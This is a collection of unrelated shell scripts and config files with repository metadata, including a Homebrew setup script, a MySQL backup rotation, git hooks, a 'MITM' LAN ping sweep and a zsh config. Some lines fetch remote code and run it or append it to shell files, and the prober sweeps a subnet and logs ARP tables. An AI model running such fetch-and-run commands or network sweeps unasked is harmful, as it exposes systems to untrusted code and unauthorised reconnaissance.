} > md/doc/json-rpc/README.md
../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages help | while read -r helpline; do
if [ -n "$helpline" ]; then
if [[ "$helpline" =~ ^==[[:space:]](.*)[[:space:]]==$ ]]; then
# Found a category.
category="${BASH_REMATCH[1]}"
# Write category to new mkdocs file.
echo "$indentation- $category:" >> mkdocs.yml
# Write category to readme file.
{
echo
echo "## $category"
echo
} >> md/doc/json-rpc/README.md
else
# Found a command.
command=${helpline%% *}
# Write command to new mkdocs file.
echo "$indentation  - $command: doc/json-rpc/$command.md" >> mkdocs.yml
# Create command help page.
"@CMAKE_SOURCE_DIR@/contrib/devtools/rpc-help-to-markdown.py" "$(../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages help $command)" > "md/doc/json-rpc/$command.md"
{
echo
echo "***"
echo
echo "*$version*"
} >> "md/doc/json-rpc/$command.md"
# Write command to readme file.
if [ "$command" == "$helpline" ]; then
echo "* [**\`$command\`**]($command.md)" >> md/doc/json-rpc/README.md
else
echo "* [**\`$command\`**\` ${helpline:${#command}}\`]($command.md)" >> md/doc/json-rpc/README.md
fi
fi
fi
done
# Footer with the daemon version for the README page.
{
echo
echo "***"
echo
echo "*$version*"
} >> md/doc/json-rpc/README.md
fi
done < "@CMAKE_CURRENT_SOURCE_DIR@/mkdocs.yml.in"
# Stop the regtest node.
../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages stop
# Remove the temporary node data directory.
rm -r md/doc/json-rpc/tmp
if [ "@DOC_ONLINE@" == "OFF" ]; then
# Directory URLs do not work when browsing local HTML files, so disable them.
echo "use_directory_urls: false" >> mkdocs.yml
# Search plug-in does not work when browsing local HTML files (due to same-origin policy), so disable it.
echo "plugins: []" >> mkdocs.yml
else
# Delete next release draft release notes for online publication.
rm md/doc/release-notes.md
# Append warning about possible API changes in master branch.
file_list=(md/doc/cli/*.md)
for md in "${file_list[@]}"; do
{
echo ""
echo "***"
} >> "$md"
done
file_list=(md/doc/cli/*.md md/doc/json-rpc/*.md)
for md in "${file_list[@]}"; do
{
echo ""
echo "<small>Documentation on docs.bitcoincashnode.org reflects the current master branch in Git, and may include API changes that are not yet present in the latest release.</small>"
} >> "$md"
done
fi
| true
|
fa8935ce64ab9d7d24a1702ecccc1efc479294f8
|
Shell
|
ryosebach/dotfiles
|
/etc/init/osx/03_brew_app_install.sh
|
UTF-8
| 339
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the Homebrew packages used by this dotfiles setup.
# Fixed: the original shebang was #!/bin/sh, but arrays are a bashism and
# break when /bin/sh is dash — run under bash explicitly.
# Sources the dotfiles helper library for e_arrow/e_success/os_detect.
test -r ~/.dotfiles/etc/install && . ~/.dotfiles/etc/install && os_detect
e_arrow "brew application installing"
BrewApp=(
the_platinum_searcher
go
peco
ghq
tig
gibo
wget
nkf
ghostscript
hub
tree
graphviz
neovim
python
python@2
)
# Quote the expansions (SC2068/SC2086); package names are then passed
# through verbatim even if a future entry contains special characters.
for app in "${BrewApp[@]}"; do
brew install "$app"
done
e_success "brew application is installed"
| true
|
1b71044694444bc5361a28b09b9f857430f3508f
|
Shell
|
Joanna4983/MITM-repo
|
/prober.sh
|
UTF-8
| 240
| 2.640625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
for nr in {1..255}
do
ping -c 1 -W 0.2 192.168.43.$nr > /dev/null & ## Possible error here if not on correct network when running
if ! (($nr % 51)); then
arp -a >> /root/PycharmProjects/MITM/hosts2.txt
fi
done
exit 0
| true
|
ed8b65351e184af7632e13731d863335107b154b
|
Shell
|
rezacloner1372/MysqlBAckup
|
/mysqldump.sh
|
UTF-8
| 1,570
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Daily MySQL backup with a simple daily/weekly/monthly rotation scheme.
#
# Required directories (create before first run):
#   /Backup-last  /Backup-old  /Backup-old/weekly  /Backup-old/monthly
#
# Fixed: the shebang must be the very first line of the file — in the
# original it sat below the comment banner and was therefore ignored.
BACKUP_last="/Backup-last"
BACKUP_old="/Backup-old"
TODAY=$(date +"%Y-%m-%d")
MYSQL_USER="root"
# SECURITY NOTE(review): the password is hardcoded and passed on the
# command line (visible in `ps`); prefer ~/.my.cnf or --defaults-extra-file.
MYSQL_PASSWORD="YOUR PASSWORD"
MYSQL=/usr/bin/mysql
MYSQLDUMP=/usr/bin/mysqldump
DAILY_DELETE_NAME="daily-$(date +"%Y-%m-%d" --date '7 days ago')"
WEEKLY_DELETE_NAME="weekly-$(date +"%Y-%m-%d" --date '4 weeks ago')"
MONTHLY_DELETE_NAME="monthly-$(date +"%Y-%m-%d" --date '12 months ago')"
DB="YOUR DATABASE NAME"
# redirect stdout/stderr to a file
exec &> /var/log/logfile.log
# Age out yesterday's backup before creating today's.
mv -v "$BACKUP_last"/* "$BACKUP_old"
# run dump
echo " ***running dump*** "
# NOTE(review): only daily-* files are ever created, so the weekly-* and
# monthly-* names can never match existing files; the rotation scheme looks
# unfinished — confirm intended behavior before relying on it.
if [ -f "$BACKUP_old/$DAILY_DELETE_NAME.sql" ]; then
echo " moving weekly files "
mv -v "$BACKUP_old/$DAILY_DELETE_NAME.sql" "$BACKUP_old/weekly"
mv -v "$BACKUP_old/$DAILY_DELETE_NAME.txt" "$BACKUP_old/weekly"
fi
if [ -f "$BACKUP_old/$MONTHLY_DELETE_NAME.sql" ]; then
echo " moving monthly files "
mv -v "$BACKUP_old/$MONTHLY_DELETE_NAME.sql" "$BACKUP_old/monthly"
mv -v "$BACKUP_old/$MONTHLY_DELETE_NAME.txt" "$BACKUP_old/monthly"
fi
# Consistent, non-blocking dump of the configured database.
mysqldump --user="$MYSQL_USER" --password="$MYSQL_PASSWORD" --single-transaction --quick --lock-tables=false "$DB" > "$BACKUP_last/daily-$TODAY.sql"
echo "daily-$TODAY.sql has been created"
# Create a checksum so restores can verify dump integrity.
md5sum "$BACKUP_last/daily-$TODAY.sql" > "$BACKUP_last/daily-$TODAY.txt"
echo "Hash $BACKUP_last/daily-$TODAY.txt has been created"
| true
|
0bac2b7b8ea9a83e850852ae95f937f73805cda1
|
Shell
|
ycwu1030/cxSMScan
|
/RuncxSM.sh
|
UTF-8
| 328
| 2.90625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build cxSMThermalMassOnly, then launch 10 detached screen sessions, each
# running one cxSMSingleRun.sh worker writing into ./Data.
id=1
dir=$(pwd)
cd cxSMThermalMassOnly
make clean; make
cd "$dir"
datadir=$dir/Data
mkdir -p "$datadir"
mkdir -p "$datadir/cxx"
mkdir -p "$datadir/cosmo"
while [ "$id" -le 10 ]
do
# Zero-pad the worker id (01..10) for the screen session name.
printf -v ID "%02d" "$id"
screen -S CXSM0828"$ID" -d -m bash -c "./cxSMSingleRun.sh $datadir "$id"; exec bash;"
# Fixed: $[ ... ] is deprecated bash syntax; use POSIX arithmetic expansion.
id=$((id+1))
done
| true
|
b565776ab6bbd3c473436682eef133dea9de56db
|
Shell
|
ftravers/arch-home
|
/bin/git-hooks-post-receive
|
UTF-8
| 1,040
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
# git post-receive hook: email the latest commit summary to the interested
# parties for this repository. Toggle each recipient group below.
mail_fenton=true
mail_ii=true
mail_cisco=true
mail_avaya=true
mail_oracle=false
ii_emails=("brett.holleman@inin.com" "david.fuller@inin.com")
cisco_emails=("jahayden@cisco.com" "sbehzad@cisco.com")
avaya_emails=("ssmith@avaya.com" "abouzemberg@avaya.com" "krcouls@avaya.com")
fenton_emails=("fenton.travers@gmail.com")
# Fixed: a missing separator between the scott.glascock and ian.mclaughlan
# entries fused them into a single invalid address.
oracle_emails=("fenton.travers@oracle.com" "christophe.bayle@oracle.com" "matthew.leathers@oracle.com" "lawrence.johnson@oracle.com" "scott.glascock@oracle.com" "ian.mclaughlan@oracle.com" "ruben.lihet@oracle.com")
# Repository name: last path component with its ".git" suffix stripped.
repo="`pwd | awk 'BEGIN { FS = "/" } ; { print $(NF) }' | awk 'BEGIN { FS = "." } ; { print $1 }'`"
# emailMessage <address> — mail the one-line stat summary of HEAD.
emailMessage() {
email=$1
git log -1 --stat --pretty=format:"%h %an %ae %n %s" | mail -s "$repo: repo has been modified." "$email"
}
# mailGroup <flag> <emails...> — send to each address when flag is "true".
# Fixed: the original used `[ $flag ]`, which is true for ANY non-empty
# string, so a flag set to "false" still triggered mail.
mailGroup() {
local flag=$1; shift
[ "$flag" = true ] || return 0
local email
for email in "$@"; do
emailMessage "$email"
done
}
mailGroup "$mail_fenton" "${fenton_emails[@]}"
mailGroup "$mail_ii" "${ii_emails[@]}"
mailGroup "$mail_avaya" "${avaya_emails[@]}"
mailGroup "$mail_cisco" "${cisco_emails[@]}"
# oracle_emails were defined but never sent in the original; wired up here,
# still disabled via mail_oracle=false.
mailGroup "$mail_oracle" "${oracle_emails[@]}"
| true
|
d130ed3dc3ace3d5a00185f29e1036516a151863
|
Shell
|
konfarandras/sfdx-travisci
|
/installpackage.sh
|
UTF-8
| 766
| 2.96875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Create, promote and install a new version of an sfdx unlocked package.
# Requires the sfdx CLI and jq; aborts on the first failed command.
set -x
set -e
DESCRIPTION=testdescription
DEVHUB=TDevHub
PACKAGENAME=teltestpackage
TARGET=telkonfara
KEY=keyunicon19
echo starting installation of package...
#sfdx force:package:create --name $PACKAGENAME --description $DESCRIPTION --packagetype Unlocked --path force-app --nonamespace --targetdevhubusername $DEVHUB
sfdx force:package:version:create -p "$PACKAGENAME" -k "$KEY" --wait 10 -v "$DEVHUB"
# The CLI appends the new version alias to sfdx-project.json; pick the last
# key of .packageAliases. Quote $PACKAGES so the JSON reaches jq intact.
PACKAGES=$(jq '.packageAliases' sfdx-project.json | jq 'keys')
LASTPACKAGE=$(echo "$PACKAGES" | jq length)
LASTPACKAGE=$((LASTPACKAGE-1))
VERSION=$(echo "$PACKAGES" | jq ".[$LASTPACKAGE]")
# Strip the surrounding JSON quotes from the alias.
VERSION=${VERSION//\"}
sfdx force:package:version:promote -n -p "$VERSION"
sfdx force:package:install --wait 10 --publishwait 10 --package "$VERSION" -k "$KEY" -r -u "$TARGET"
| true
|
9b73114e89dd61c31a5cbe21368cfec8ac3f9d3a
|
Shell
|
virtualparadox/BBMap
|
/pipelines/fetch/runRefSeqProtein.sh
|
UTF-8
| 2,373
| 2.5625
| 3
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
#!/bin/bash
#SBATCH -J sketch_refseq
#SBATCH -q genepool
#SBATCH -A gtrqc
#SBATCH -N 1
#SBATCH -C haswell
#SBATCH -t 71:00:00
#SBATCH --error=log_%j.err
#SBATCH --output=log_%j.out
#SBATCH --exclusive
set -e
#Written by Brian Bushnell
#Last updated August 19, 2019
#Filters prokaryotic clades, translates them to protein, and sketches them.
#To use this script outside of NERSC, modify $TAXPATH to point to your directory with the BBTools taxonomy data,
#e.g. TAXPATH="/path/to/taxonomy_directory/"
TAXPATH="auto"
#Ensure necessary executables are in your path
#module load pigz
mkdir prot
# Keep only prokaryotic/viral/plasmid sequences from the sorted input.
time filterbytaxa.sh in=sorted.fa.gz out=prot/prok.fa.gz fastawrap=4095 ids=Viruses,Bacteria,Archaea,plasmids tree=auto -Xmx16g include taxpath=$TAXPATH zl=9 requirepresent=f
cd prot
# Stream RefSeq genomic FASTA straight from NCBI into gi2taxid relabeling
# (no intermediate download files kept).
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/protozoa/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=protozoa.fa.gz zl=9 server ow
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/mitochondrion/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=mito.fa.gz zl=9 server ow
wget -q -O - ftp://ftp.ncbi.nlm.nih.gov/refseq/release/plastid/*genomic.fna.gz | gi2taxid.sh -Xmx1g in=stdin.fa.gz out=chloro.fa.gz zl=9 server ow
# Predict genes and translate each nucleotide set to protein (.faa).
time callgenes.sh in=prok.fa.gz outa=prok.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=protozoa.fa.gz outa=protozoa.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=mito.fa.gz outa=mito.faa.gz -Xmx16g ow ordered=f zl=9
time callgenes.sh in=chloro.fa.gz outa=chloro.faa.gz -Xmx16g ow ordered=f zl=9
cat prok.faa.gz mito.faa.gz chloro.faa.gz protozoa.faa.gz > all.faa.gz
# Build amino-acid blacklists of overrepresented kmers at family and genus
# level, merge them, then sketch everything with the merged blacklist.
time sketchblacklist.sh -Xmx63g in=prok.faa.gz prepasses=1 tree=auto taxa taxlevel=family ow out=blacklist_prokprot_family_40.sketch mincount=40 k=9,12 sizemult=3 amino taxpath=$TAXPATH
time sketchblacklist.sh -Xmx63g in=prok.faa.gz prepasses=1 tree=auto taxa taxlevel=genus ow out=blacklist_prokprot_genus_80.sketch mincount=80 k=9,12 sizemult=3 amino taxpath=$TAXPATH
mergesketch.sh -Xmx1g in=blacklist_prokprot_genus_80.sketch,blacklist_prokprot_family_40.sketch out=blacklist_prokprot_merged.sketch amino name0=blacklist_prokprot_merged k=9,12 ow
time bbsketch.sh -Xmx63g in=all.faa.gz out=taxa#.sketch mode=taxa tree=auto files=31 ow unpigz minsize=200 prefilter autosize blacklist=blacklist_prokprot_merged.sketch k=9,12 depth sizemult=3 amino taxpath=$TAXPATH
| true
|
86ed964d7bceb864030984ffbcab5e33640ee7fb
|
Shell
|
Linux-Project-Puppet-Deploy/puppet-install-script
|
/install.sh
|
UTF-8
| 1,454
| 4.1875
| 4
|
[] |
no_license
|
#!/bin/sh
#
#
# This script install puppet sources
#
# Usage : install.sh [agent|server] [hostname] [puppet_ip] [puppet_dns]
PACKAGE_NAME=""
FILENAME="puppetlabs-release-pc1-jessie.deb"
case $1 in
"agent")
PACKAGE_NAME="puppet-agent"
[ "$#" -ne 4 ] && echo "Agent parameters are wrong" && exit 1
echo "$3\t$4" >> /etc/hosts
;;
"server")
PACKAGE_NAME="puppetserver"
;;
*)
echo "Wrong argument (agent|server)"
exit 1
;;
esac
echo "Install required packages..."
apt-get install -y ca-certificates >/dev/null 2>&1
[ $? -ne 0 ] && echo "Packages / Download failed" && exit 1
wget -P /tmp/ -q https://apt.puppetlabs.com/$FILENAME
[ $? -ne 0 ] && echo "Puppetlabs / Downlaod failed" && exit 1
dpkg -i /tmp/puppetlabs-release-pc1-jessie.deb >/dev/null 2>&1
[ $? -ne 0 ] && echo "Puppetlabs / Installation failed" && exit 1
apt-get update >/dev/null 2>&1
[ $? -ne 0 ] && echo "Update failed" && exit 1
apt-get install -y $PACKAGE_NAME >/dev/null 2>&1
if [ $? -eq 0 ]; then
if [ $1 = "agent" ]; then
[ ! -f /etc/puppetlabs/puppet/puppet.conf ] && echo "Puppet Agent .conf not found" && exit 1
cat << EOF > /etc/puppetlabs/puppet/puppet.conf
[main]
certname = $2.ynov.co
server = $4
environment = production
runinterval = 10m
EOF
fi
echo "Successfully"
echo "##"
echo "## Please run : /opt/puppetlabs/bin/puppet agent -t"
echo "##"
else
echo "$PACKAGE_NAME installation failed"
exit 1
fi
| true
|
4f2ad7d5a858060f5c383e9d161c9c13b11df5d8
|
Shell
|
docker-in-practice/image-stepper
|
/example/tag.sh
|
UTF-8
| 159
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
x=1
for id in $(docker history -q "myimage:latest" | grep -vw missing | tac)
do
docker tag "${id}" "myimage:latest_step_${x}"
((x++))
done
| true
|
1ba68e15c2ee8f14328b5e7de049d29ac47f06c6
|
Shell
|
akora/vagrant-project-templates
|
/project-name/vagrant-scripts/install-git.sh
|
UTF-8
| 1,205
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# be careful with the source path below! it seems /vagrant/ is the path "inside" the VM!
source /vagrant/vagrant-scripts/shell-utils.sh
git_version="2.3.0" # << feel free to change it
git_global_user_name="<Your name goes here>"
git_global_email="<Your email address goes here>"
install_dir="/home/vagrant"
cd $install_dir
print_header "Installing Git"
print_message "Installing required dependencies first..." "\n"
apt-get install -y autoconf gettext libcurl4-gnutls-dev libexpat1-dev zlib1g-dev libssl-dev
print_message "Getting latest source code..." "\n"
wget https://github.com/git/git/archive/v$git_version.tar.gz
tar -zxf v$git_version.tar.gz
print_message "Compiling it..." "\n"
cd git-$git_version
make configure
./configure --prefix=/usr
make
make install
git --version
print_message "Setting global variables..." "\n"
sudo -u vagrant git config --global user.name "$git_global_user_name"
sudo -u vagrant git config --global user.email $git_global_email
# switching to the vagrant user to see the user's git config list
sudo -u vagrant git config --list
cd $install_dir
print_message "Cleaning up..." "\n"
rm -rf git-$git_version
rm v$git_version.tar.gz
exit 0
| true
|
bc760ae4ec63956b1b85c853f6dfe630abced05d
|
Shell
|
weichou1229/edgex-taf
|
/TAF/utils/scripts/docker/restart-services.sh
|
UTF-8
| 498
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
CONFIG_DIR=/custom-config
docker run --rm -v ${WORK_DIR}:${WORK_DIR} -w ${WORK_DIR} -v /var/run/docker.sock:/var/run/docker.sock \
--env WORK_DIR=${WORK_DIR} --env PROFILE=${PROFILE} --security-opt label:disable \
--env-file ${WORK_DIR}/TAF/utils/scripts/docker/common-taf.env --env CONFIG_DIR=${CONFIG_DIR} \
${COMPOSE_IMAGE} docker compose -f "${WORK_DIR}/TAF/utils/scripts/docker/docker-compose.yml" \
restart $*
# Waiting for service started
sleep 2
| true
|
ee5529ee14dcf6528a1fd8ba064b73a33f42e5ae
|
Shell
|
FabioLolix/PKGBUILD-AUR_fix
|
/zz_wip/ldmicro/PKGBUILD
|
UTF-8
| 782
| 2.59375
| 3
|
[
"WTFPL"
] |
permissive
|
# Maintainer:
pkgname=ldmicro
pkgver=5.4.1.1
pkgrel=1
pkgdesc="Ladder Logic for PIC and AVR"
arch=(x86_64)
url="https://cq.cx/ladder.pl"
license=(GPL3)
depends=()
makedepends=(cmake ninja perl)
#options=(!makeflags)
source=("${pkgname}-${pkgver}.tar.gz::https://github.com/LDmicro/LDmicro/archive/refs/tags/${pkgver}.tar.gz")
sha256sums=('12f7cc534452deaf8260a65bb088db699adc5234f7ec925d546245895ec9745b')
prepare() {
cd LDmicro-${pkgver}/ldmicro
[[ -d build ]] || mkdir build
cp -r PASCAL.CPP pascal.cpp
cp -r PCPORTS.CPP pcports.cpp
}
build() {
cd "LDmicro-${pkgver}/ldmicro/build"
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=None \
-DCMAKE_INSTALL_PREFIX=/usr
ninja
}
package() {
cd "LDmicro-${pkgver}/ldmicro/build"
make DESTDIR="${pkgdir}" install
}
| true
|
152b85cd883bd69a4b02ab3fea60075425c27b5a
|
Shell
|
mbillard/expo-cli
|
/bin/bootstrap
|
UTF-8
| 395
| 2.90625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
set -eo pipefail
scriptdir=$(dirname ${BASH_SOURCE[0]})/../node_modules/.bin
scopeArgs=()
for arg in "$@"; do
scopeArgs+=("--scope" "$arg")
done
scopeArgs+=("--include-filtered-dependencies" "--sort")
"${scriptdir}/lerna" bootstrap "${scopeArgs[@]}"
"${scriptdir}/lerna" run "${scopeArgs[@]}" --stream prepare
echo "for link information invoke 'yarn workspaces info'"
| true
|
1eb188c7fcb9678e7f42dd7c2ab9fbb0e56dcac7
|
Shell
|
allmende/watchtower
|
/rootfs/etc/s6/watchtower/setup
|
UTF-8
| 571
| 2.78125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
if [ -n "${WATCHTOWER_TLS_CA}" ]
then
if [ ! -f "${WATCHTOWER_TLS_CA}" ]
then
echo -e "${WATCHTOWER_TLS_CA}" >| /tmp/ca.crt
WATCHTOWER_TLS_CA="/tmp/ca.crt"
fi
fi
if [ -n "${WATCHTOWER_TLS_KEY}" ]
then
if [ ! -f "${WATCHTOWER_TLS_KEY}" ]
then
echo -e "${WATCHTOWER_TLS_KEY}" >| /tmp/docker.crt
WATCHTOWER_TLS_KEY="/tmp/docker.crt"
fi
fi
if [ -n "${WATCHTOWER_TLS_CERT}" ]
then
if [ ! -f "${WATCHTOWER_TLS_CERT}" ]
then
echo -e "${WATCHTOWER_TLS_CERT}" >| /tmp/docker.key
WATCHTOWER_TLS_CERT="/tmp/docker.key"
fi
fi
| true
|
7134123f3cc62a943703b84d9c916d1930d58e21
|
Shell
|
alvarcarto/alvarcarto-cartocss
|
/tools/build.sh
|
UTF-8
| 1,001
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
# Usage: bash tools/build.sh [style]
# Run from repository root!
set -e
set -x
mkdir -p dist
rm -f dist/*.xml
find ./styles -name 'generated-project.mml' -delete
find ./styles -name 'generated-styles.mss' -delete
dir_suffix=""
if [[ -n "$1" ]]; then
dir_suffix="/$1"
fi
# Convert templates to full project files
for i in $(find ./styles$dir_suffix -name 'project-sheet.mml');
do
dir=$(dirname "$i")
node js/convert-to-project.js "$i" > "$dir/generated-project.mml"
done
# Generate styles with JS
for i in $(find ./styles$dir_suffix -name 'styles.js');
do
dir=$(dirname "$i")
node js/generate.js "$i" > "$dir/generated-styles.mss"
done
# Generate styles with JS
for i in $(find ./styles$dir_suffix -name 'generated-project.mml');
do
dir=$(dirname "$i")
style=$(basename "$dir")
# Make warnings quiet, see: https://github.com/gravitystorm/openstreetmap-carto/issues/3183.
# Use certain mapnik API version
carto --api 3.0.23 --quiet "$i" > "dist/$style.xml"
done
| true
|
33850e3425cf07deeb41271d49d3b8dad295b59b
|
Shell
|
jasedit/dotphiles
|
/bash/bash_aliases
|
UTF-8
| 1,206
| 3.265625
| 3
|
[
"MIT"
] |
permissive
|
alias update-aliases="wget -q -O - \"$@\" https://alias.sh/user/1370/alias >> ~/.aliassh"
alias dotsync='~/.dotfiles/dotsync/bin/dotsync'
execute-over-ssh() {
if [ $# -ne 2 ]; then
echo "USAGE: execute-over-ssh 'server1 server2 server3' 'command1; command2; command3'"
return 1
else
servers=(${=1})
for server in $servers
do
echo ""
echo "----> Executing $2 on $server"
ssh $server "$2"
echo ""
done
return 0
fi
}
function authme() {
ssh "$1" 'mkdir -p ~/.ssh && cat >> ~/.ssh/authorized_keys' \
< ~/.ssh/id_dsa.pub
}
extract () {
if [ -f $1 ] ; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar e $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
alias tm='ps -ef | grep'
| true
|
39768ddff72135e43bcf49aed823ec4194e3eb42
|
Shell
|
mjmerin/config_files
|
/brewinstalls.sh
|
UTF-8
| 1,167
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/sh
# Homebrew All the Things I Need
#
# Install all the things I need on a macos system using Homebrew
# To execute: save and `chmod +x ./brewinstalls.sh` then `./brewinstalls.sh`
echo "Installing Homebrew..."
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
echo "Installing brew cask..."
brew tap caskroom/cask
#Programming Languages
echo "Installing Programming Languages..."
brew install node
brew install python3
brew install ruby
#Dev Tools
echo "Installing SW Development Tools..."
brew install bash-completion
brew install git
brew install git-extras
brew install tree
brew install watch
brew cask install dash
brew cask install emacs
brew cask install iterm2
brew cask install macvim
brew cask install visual-studio-code
#Communication Apps
echo "Installing Communication Apps"
brew cask install skype
brew cask install slack
#Web Stuff
echo "Installing Browsers..."
brew cask install firefox
brew cask install google-chrome
#Productivity Tools
echo "Installing Productivity Tools..."
brew install htop
brew install the_silver_searcher
brew install tmux
brew install googler
brew install dict
| true
|
e2acc92b8eae16c7b6fd0f81db3612d0b466b3d7
|
Shell
|
skiv71/BMSLink-core
|
/com/dev-del
|
UTF-8
| 192
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
# args
sn=$1
# initialise
path=$(dev-path $sn)
# check
[ -n "$path" ] || exit 1
# initialise
table=devices
# main
bms-sql DELETE FROM $table WHERE serial=\"$sn\"
rm -rf $path
| true
|
e037c05dbf8520564c39f9a2cf8e8a798d8871c0
|
Shell
|
RustyToms/dotfiles
|
/modules/npm/npm_run.sh
|
UTF-8
| 1,183
| 3.953125
| 4
|
[] |
no_license
|
#!/bin/zsh
# Utility to quickly switch between difference NPM
# accounts using auth tokens.
#
# This utility requires that you define environment
# variables based on the following rules:
#
# - `NPM_AUTH_TOKEN_<profile>`=<auth token>
#
# where profile is your desired profile name.
#
# This script will set `NPM_AUTH_TOKEN` with the
# resulting token. Make sure your `.npmrc` file
# is configured to read from it.
set -u
set -e
if [ "$#" -lt 2 ]; then
echo "Usage: $0 <profile> <command...>" 1>&2
exit 1
fi
# Transform to uppercase
# See http://stackoverflow.com/a/11392235/1641422
ARGV_PROFILE=$(echo "$1" | tr '[:lower:]' '[:upper:]')
TOKEN_ENVIRONMENT_VARIABLE="NPM_AUTH_TOKEN_$ARGV_PROFILE"
# We need to check the variable exists before attempting
# to blindly expand it afterwards to avoid shell errors
if ! set | grep --text "^$TOKEN_ENVIRONMENT_VARIABLE" >/dev/null; then
echo "Unknown profile: $ARGV_PROFILE"
exit 1
fi
echo "Loading profile $ARGV_PROFILE..."
# Dynamically expand variable
# See http://unix.stackexchange.com/a/251896/43448
export NPM_AUTH_TOKEN=$(print -rl -- ${(P)TOKEN_ENVIRONMENT_VARIABLE})
echo "Logged in as $(npm whoami)"
npm ${@:2}
| true
|
8262ff286dd60d56c2ac983fe02ae7a9d93004b9
|
Shell
|
rackerlabs/autoscale-cruft
|
/monitoring/plugins/zookeeper_check.sh
|
UTF-8
| 183
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
output=$(echo ruok | nc localhost 2181)
if [ $output != 'imok' ]; then
echo "status CRITICAL zookeeper not healthy"
exit 1
fi
echo "status OK zookeeper is healthy"
| true
|
fd9d6f77a7ad6673cda5d1c7b495a111265e50a9
|
Shell
|
revspace/statelogger
|
/create-heatmaps
|
UTF-8
| 300
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
set -e
c='./sldump --heatmap --json'
o='heatmaps'
[ -e $o ] || mkdir $o
$c > $o/alltime.json &
$c --days 7 > $o/7days.json
$c --days 70 > $o/70days.json
$c --days 365 > $o/365days.json
for year in $(seq 2010 $(date +%Y)); do
$c --period $year > $o/year$year.json
done
wait
| true
|
fd7fd0509fc09ee9d24646c286d392e472b81a7d
|
Shell
|
subnut/dotfiles-old
|
/linux/home/.zshrc
|
UTF-8
| 14,602
| 2.921875
| 3
|
[] |
no_license
|
# Keep this ABOVE p10k instant prompt
# Otherwise it gets set to "not a tty"
export GPG_TTY=$(tty)
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
# If you come from bash you might have to change your $PATH.
# export PATH=$HOME/bin:/usr/local/bin:$PATH
# Path to your oh-my-zsh installation.
export ZSH="/home/subhaditya/.oh-my-zsh"
# Set name of the theme to load --- if set to "random", it will
# load a random theme each time oh-my-zsh is loaded, in which case,
# to know which specific one was loaded, run: echo $RANDOM_THEME
# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
ZSH_THEME="powerlevel10k/powerlevel10k"
#ZSH_THEME="robbyrussell"
# Set list of themes to pick from when loading at random
# Setting this variable when ZSH_THEME=random will cause zsh to load
# a theme from this variable instead of looking in ~/.oh-my-zsh/themes/
# If set to an empty array, this variable will have no effect.
# ZSH_THEME_RANDOM_CANDIDATES=( "robbyrussell" "agnoster" )
# Uncomment the following line to use case-sensitive completion.
# CASE_SENSITIVE="true"
# Uncomment the following line to use hyphen-insensitive completion.
# Case-sensitive completion must be off. _ and - will be interchangeable.
# HYPHEN_INSENSITIVE="true"
# Uncomment the following line to disable bi-weekly auto-update checks.
# DISABLE_AUTO_UPDATE="true"
# Uncomment the following line to automatically update without prompting.
# DISABLE_UPDATE_PROMPT="true"
# Uncomment the following line to change how often to auto-update (in days).
# export UPDATE_ZSH_DAYS=13
# Uncomment the following line if pasting URLs and other text is messed up.
# DISABLE_MAGIC_FUNCTIONS=true
# Uncomment the following line to disable colors in ls.
# DISABLE_LS_COLORS="true"
# Uncomment the following line to disable auto-setting terminal title.
# DISABLE_AUTO_TITLE="true"
# Uncomment the following line to enable command auto-correction.
ENABLE_CORRECTION="true"
# Uncomment the following line to display red dots whilst waiting for completion.
COMPLETION_WAITING_DOTS="true"
# Uncomment the following line if you want to disable marking untracked files
# under VCS as dirty. This makes repository status check for large repositories
# much, much faster.
# DISABLE_UNTRACKED_FILES_DIRTY="true"
# Uncomment the following line if you want to change the command execution time
# stamp shown in the history command output.
